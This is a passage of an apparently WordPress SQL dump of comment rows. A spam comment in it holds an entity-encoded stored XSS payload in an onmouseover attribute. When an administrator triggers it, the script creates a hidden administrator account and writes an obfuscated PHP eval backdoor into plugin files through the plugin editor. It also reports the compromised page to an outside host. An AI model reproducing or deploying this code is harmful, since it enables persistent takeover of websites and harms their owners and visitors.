46;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);
INSERT INTO `www2_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(148, 1, 'toms', 'xqppisrtzty@gmail.com', 'http://www.facebook.com/pwllhaonte7i', '117.240.187.35', '2015-11-11 11:27:41', '2015-11-11 11:27:41', 'Hi nice ar wnet<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;